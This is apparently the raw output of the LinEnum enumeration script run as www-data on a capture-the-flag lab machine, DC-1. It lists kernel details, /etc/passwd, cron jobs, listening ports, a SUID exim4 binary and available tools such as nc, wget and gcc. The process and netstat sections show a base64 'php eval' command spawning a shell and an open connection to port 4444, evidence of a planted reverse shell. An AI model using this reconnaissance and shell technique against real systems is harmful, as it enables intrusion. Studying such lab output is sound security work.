#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.95
6
[-] Debug Info
[+] Thorough tests = Disabled
10
Scan started at:
Tue May 7 01:08:48 AEST 2019
### SYSTEM ##############################################
[-] Kernel information:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
18
19
[-] Kernel information (continued):
Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
22
23
[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/"
34
35
[-] Hostname:
DC-1
38
39
### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
44
[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Thu Feb 28 12:10:51 +1000 2019
48
49
50 [00;31m[-] Who else is logged on:[00m51 01:08:48 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
52 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT53
54
55 [00;31m[-] Group memberships:[00m56 uid=0(root) gid=0(root) groups=0(root)57 uid=1(daemon) gid=1(daemon) groups=1(daemon)58 uid=2(bin) gid=2(bin) groups=2(bin)59 uid=3(sys) gid=3(sys) groups=3(sys)60 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)61 uid=5(games) gid=60(games) groups=60(games)62 uid=6(man) gid=12(man) groups=12(man)63 uid=7(lp) gid=7(lp) groups=7(lp)64 uid=8(mail) gid=8(mail) groups=8(mail)65 uid=9(news) gid=9(news) groups=9(news)66 uid=10(uucp) gid=10(uucp) groups=10(uucp)67 uid=13(proxy) gid=13(proxy) groups=13(proxy)68 uid=33(www-data) gid=33(www-data) groups=33(www-data)69 uid=34(backup) gid=34(backup) groups=34(backup)70 uid=38(list) gid=38(list) groups=38(list)71 uid=39(irc) gid=39(irc) groups=39(irc)72 uid=41(gnats) gid=41(gnats) groups=41(gnats)73 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)74 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)75 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)76 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)77 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)78 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)79 uid=105(mysql) gid=109(mysql) groups=109(mysql)80 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)81
82
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
110
[-] Super user account(s):
root
114
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Feb 19 23:51 .
drwxr-xr-x 23 root root 4.0K Feb 19 22:34 ..
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4
121
[-] Root is allowed to login via SSH:
PermitRootLogin yes
125
126 [00;33m### ENVIRONMENTAL ####################################### [00m
127 [00;31m[-] Environment information:[00m128 APACHE_PID_FILE=/var/run/apache2.pid129 APACHE_RUN_USER=www-data130 APACHE_LOG_DIR=/var/log/apache2131 PATH=/usr/local/bin:/usr/bin:/bin132 PWD=/var/www133 APACHE_RUN_GROUP=www-data134 LANG=C135 SHLVL=1
136 APACHE_LOCK_DIR=/var/lock/apache2137 APACHE_RUN_DIR=/var/run/apache2138 _=/usr/bin/env139
140
141 [00;31m[-] Path information:[00m142 /usr/local/bin:/usr/bin:/bin143
144
145 [00;31m[-] Available shells:[00m146 #/etc/shells: valid login shells
147 /bin/sh148 /bin/dash149 /bin/bash150 /bin/rbash151
152
153 [00;31m[-] Current umask value:[00m154 0022
155 u=rwx,g=rx,o=rx156
157
158 [00;31m[-] umask value as specified in /etc/login.defs:[00m159 UMASK 022
160
161
[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
168
169 [00;33m### JOBS/TASKS ########################################## [00m
170 [00;31m[-] Cron jobs:[00m171 -rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab172
173 /etc/cron.d:
174 total 16
175 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
176 drwxr-xr-x 85 root root 4096 May 7 00:08 ..
177 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder178 -rw-r--r-- 1 root root 510 May 10 2018php5179
180 /etc/cron.daily:
181 total 68
182 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
183 drwxr-xr-x 85 root root 4096 May 7 00:08 ..
184 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder185 -rwxr-xr-x 1 root root 633 May 30 2018apache2186 -rwxr-xr-x 1 root root 14985 Oct 24 2014apt187 -rwxr-xr-x 1 root root 314 Nov 5 2012aptitude188 -rwxr-xr-x 1 root root 355 Jun 11 2012bsdmainutils189 -rwxr-xr-x 1 root root 256 May 3 2016dpkg190 -rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base191 -rwxr-xr-x 1 root root 89 May 17 2012logrotate192 -rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db193 -rwxr-xr-x 1 root root 606 Sep 25 2010mlocate194 -rwxr-xr-x 1 root root 249 May 26 2012passwd195
196 /etc/cron.hourly:
197 total 12
198 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
199 drwxr-xr-x 85 root root 4096 May 7 00:08 ..
200 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder201
202 /etc/cron.monthly:
203 total 12
204 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
205 drwxr-xr-x 85 root root 4096 May 7 00:08 ..
206 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder207
208 /etc/cron.weekly:
209 total 16
210 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
211 drwxr-xr-x 85 root root 4096 May 7 00:08 ..
212 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder213 -rwxr-xr-x 1 root root 907 Jun 19 2012 man-db214
215
216 [00;31m[-] Crontab contents:[00m217 #/etc/crontab: system-wide crontab
218 #Unlike any other crontab you don't have to run the `crontab'
219 #command to install the new version when you edit this file
220 #and files in /etc/cron.d. These files also have username fields,
221 #that none of the other crontabs do.
222
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
233
234 [00;33m### NETWORKING ########################################## [00m
235 [00;31m[-] Network and IP info:[00m236 eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98
237 inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0
238 inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link239 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
240 RX packets:8702 errors:0 dropped:0 overruns:0 frame:0
241 TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0
242 collisions:0 txqueuelen:1000
243 RX bytes:1325354 (1.2 MiB) TX bytes:1103771 (1.0MiB)244
245 lo Link encap:Local Loopback246 inet addr:127.0.0.1 Mask:255.0.0.0
247 inet6 addr: ::1/128 Scope:Host248 UP LOOPBACK RUNNING MTU:16436 Metric:1
249 RX packets:50 errors:0 dropped:0 overruns:0 frame:0
250 TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
251 collisions:0 txqueuelen:0
252 RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7KiB)253
254
[-] ARP history:
192.168.16.254 dev eth0 lladdr 00:22:aa:d0:dd:95 REACHABLE
192.168.16.112 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE
259
260 [00;31m[-] Nameserver(s):[00m261 nameserver 192.168.16.254
262 nameserver 0.0.0.0
263
264
[-] Default route:
default via 192.168.16.254 dev eth0
268
[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::34190 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT -
tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT -
285
286
287 [00;31m[-] Listening UDP:[00m288 Active Internet connections (servers and established)289 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name290 udp 0 0 0.0.0.0:59942 0.0.0.0:* -
291 udp 0 0 0.0.0.0:68 0.0.0.0:* -
292 udp 0 0 0.0.0.0:111 0.0.0.0:* -
293 udp 0 0 0.0.0.0:769 0.0.0.0:* -
294 udp 0 0 127.0.0.1:801 0.0.0.0:* -
295 udp 0 0 0.0.0.0:21881 0.0.0.0:* -
296 udp6 0 0 :::52815 :::* -
297 udp6 0 0 :::28256 :::* -
298 udp6 0 0 :::111 :::* -
299 udp6 0 0 :::769 :::* -
300
301
302 [00;33m### SERVICES ############################################# [00m
303 [00;31m[-] Running processes:[00m304 USER PID %CPU %MEM VSZ RSS TTY STAT START TIMECOMMAND305 root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2]306 root 2 0.0 0.0 0 0 ? S 00:08 0:00[kthreadd]307 root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0]308 root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0]309 root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0]310 root 7 0.0 0.0 0 0 ? S< 00:08 0:00[cpuset]311 root 8 0.0 0.0 0 0 ? S< 00:08 0:00[khelper]312 root 9 0.0 0.0 0 0 ? S 00:08 0:00[kdevtmpfs]313 root 10 0.0 0.0 0 0 ? S< 00:08 0:00[netns]314 root 11 0.0 0.0 0 0 ? S 00:08 0:00[sync_supers]315 root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default]316 root 13 0.0 0.0 0 0 ? S< 00:08 0:00[kintegrityd]317 root 14 0.0 0.0 0 0 ? S< 00:08 0:00[kblockd]318 root 15 0.0 0.0 0 0 ? S 00:08 0:00[khungtaskd]319 root 16 0.0 0.0 0 0 ? S 00:08 0:00[kswapd0]320 root 17 0.0 0.0 0 0 ? SN 00:08 0:00[ksmd]321 root 18 0.0 0.0 0 0 ? S 00:08 0:00[fsnotify_mark]322 root 19 0.0 0.0 0 0 ? S< 00:08 0:00[crypto]323 root 95 0.0 0.0 0 0 ? S 00:08 0:00[khubd]324 root 105 0.0 0.0 0 0 ? S< 00:08 0:00[ata_sff]325 root 115 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_0]326 root 125 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_1]327 root 134 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_2]328 root 135 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_3]329 root 136 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_4]330 root 137 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_5]331 root 138 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_6]332 root 139 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_7]333 root 140 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_8]334 root 141 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_9]335 root 142 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_10]336 root 143 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_11]337 root 144 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_12]338 root 145 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_13]339 root 146 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_14]340 root 147 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_15]341 root 148 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_16]342 root 149 0.0 0.0 0 0 ? 
S 00:08 0:00[scsi_eh_17]343 root 150 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_18]344 root 151 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_19]345 root 152 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_20]346 root 153 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_21]347 root 154 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_22]348 root 155 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_23]349 root 156 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_24]350 root 157 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_25]351 root 158 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_26]352 root 159 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_27]353 root 160 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_28]354 root 161 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_29]355 root 162 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_30]356 root 163 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_31]357 root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29]358 root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30]359 root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8]360 root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit]361 root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon362 root 543 0.0 0.0 0 0 ? S< 00:08 0:00[ttm_swap]363 root 699 0.0 0.0 0 0 ? S< 00:08 0:00[kpsmoused]364 root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w365 statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd366 root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon367 root 1903 0.0 0.0 0 0 ? S< 00:08 0:00[rpciod]368 root 1905 0.0 0.0 0 0 ? S< 00:08 0:00[nfsiod]369 root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd370 root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5371 root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid372 root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start373 daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd374 103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system
375 www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start376 www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start377 www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start378 www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start379 root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron380 root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe381 mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
382 root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error383 101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m384 root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400tty2385 root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400tty3386 root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400tty4387 root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400tty5388 root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400tty6389 root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0]390 root 3298 0.0 0.2 5196 2320 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0391 root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd392 root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400tty1393 www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start394 www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start395 www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start396 www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start397 www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start398 www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start399 www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(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.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));'
400 www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(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.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));401 www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh402 www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh403 root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1]404 root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2]405 www-data 4398 0.0 0.1 3500 1764 ? S 01:08 0:00 /bin/bash ./LinEnum.sh406 www-data 4399 0.0 0.1 3552 1380 ? S 01:08 0:00 /bin/bash ./LinEnum.sh407 www-data 4400 0.0 0.0 1876 452 ? S 01:08 0:00 tee -a408 www-data 4570 0.0 0.1 3536 1092 ? S 01:08 0:00 /bin/bash ./LinEnum.sh409 www-data 4571 0.0 0.0 2832 996 ? R 01:08 0:00ps aux410
411
412 [00;31m[-] Process binaries and associated permissions (from above list):[00m413 -rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash414 lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh ->dash415 -rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty416 -rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd417 -rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind418 -rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon419 -rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid420 lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2421 -rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd422 -rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron423 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4424 -rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld425 -rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd426 -rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd427 -rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd428
429
430 [00;31m[-] /etc/init.d/ binary permissions:[00m431 total 280
432 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
433 drwxr-xr-x 85 root root 4096 May 7 00:08 ..
434 -rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot435 -rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start436 -rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop437 -rw-r--r-- 1 root root 2427 Oct 16 2012README438 -rwxr-xr-x 1 root root 2227 Apr 16 2013acpid439 -rwxr-xr-x 1 root root 7820 May 26 2018apache2440 -rwxr-xr-x 1 root root 1071 Jun 25 2011atd441 -rwxr-xr-x 1 root root 1276 Oct 16 2012bootlogs442 -rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh443 -rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh444 -rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh445 -rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh446 -rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup447 -rwxr-xr-x 1 root root 3033 Jul 3 2012cron448 -rwxr-xr-x 1 root root 2813 Feb 6 2015dbus449 -rwxr-xr-x 1 root root 6435 Feb 11 2018exim4450 -rwxr-xr-x 1 root root 1329 Oct 16 2012halt451 -rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh452 -rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh453 -rwxr-xr-x 1 root root 7592 Apr 28 2012kbd454 -rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup455 -rwxr-xr-x 1 root root 1293 Oct 16 2012killprocs456 -rwxr-xr-x 1 root root 1990 May 21 2012kmod457 -rwxr-xr-x 1 root root 2405 Sep 26 2016mcstrans458 -rwxr-xr-x 1 root root 995 Oct 16 2012motd459 -rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh460 -rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh461 -rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh462 -rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh463 -rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh464 -rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh465 -rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh466 -rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql
467 -rwxr-xr-x 1 root root 4322 Mar 14 2013networking468 -rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common469 -rwxr-xr-x 1 root root 1346 May 20 2012procps470 -rwxr-xr-x 1 root root 6120 Oct 16 2012rc471 -rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local472 -rwxr-xr-x 1 root root 117 Oct 16 2012rcS473 -rwxr-xr-x 1 root root 639 Oct 16 2012reboot474 -rwxr-xr-x 1 root root 2727 Sep 26 2016restorecond475 -rwxr-xr-x 1 root root 1074 Jul 15 2013rmnologin476 -rwxr-xr-x 1 root root 2344 May 10 2017rpcbind477 -rwxr-xr-x 1 root root 3054 Oct 8 2014rsyslog478 -rwxr-xr-x 1 root root 3200 Oct 16 2012sendsigs479 -rwxr-xr-x 1 root root 590 Oct 16 2012single480 -rw-r--r-- 1 root root 4290 Oct 16 2012skeleton481 -rwxr-xr-x 1 root root 3881 Apr 15 2016ssh482 -rwxr-xr-x 1 root root 8827 Nov 9 2012udev483 -rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab484 -rwxr-xr-x 1 root root 2721 Apr 10 2013umountfs485 -rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh486 -rwxr-xr-x 1 root root 1122 Oct 16 2012umountroot487 -rwxr-xr-x 1 root root 3111 Oct 16 2012urandom488 -rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils489 -rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common490
491
492 [00;31m[-] /etc/init/ config file permissions:[00m493 total 48
494 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
495 drwxr-xr-x 85 root root 4096 May 7 00:08 ..
496 -rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf497 -rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf498 -rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf499 -rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf500 -rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf501 -rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf502 -rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf503 -rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf504 -rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf505 -rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf506
507
508 [00;31m[-] /lib/systemd/*config file permissions: [00m509 /lib/systemd/:510 total 4.0K511 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system512
513 /lib/systemd/system:514 total 56K515 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants516 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants517 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants518 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants519 -rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service520 -rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket521 -rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service522 -rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket523 -rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket524 -rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service525 -rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service526 -rw-r--r-- 1 root root 384 Apr 29 2013 udev.service527 -rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service528 -rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket529
530 /lib/systemd/system/dbus.target.wants:531 total 0532 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket533
534 /lib/systemd/system/multi-user.target.wants:535 total 0536 lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service537
538 /lib/systemd/system/sockets.target.wants:539 total 0540 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket541 lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket542 lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket543
544 /lib/systemd/system/basic.target.wants:545 total 0546 lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service547 lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service548
549
550 [00;33m### SOFTWARE ############################################# [00m551 [00;31m[-] MYSQL version: [00m552 mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2553
554
555 [00;31m[-] Apache user configuration: [00m556 APACHE_RUN_USER=www-data557 APACHE_RUN_GROUP=www-data558
559
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl
568
569 [00;31m[-] Installed compilers: [00m570 ii checkpolicy 2.1.8-2 i386 SELinux policy compiler571 ii gcc 4:4.7.2-1 i386 GNU C compiler572 ii gcc-4.7 4.7.2-5 i386 GNU C compiler573 ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files)574 ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files)575
576
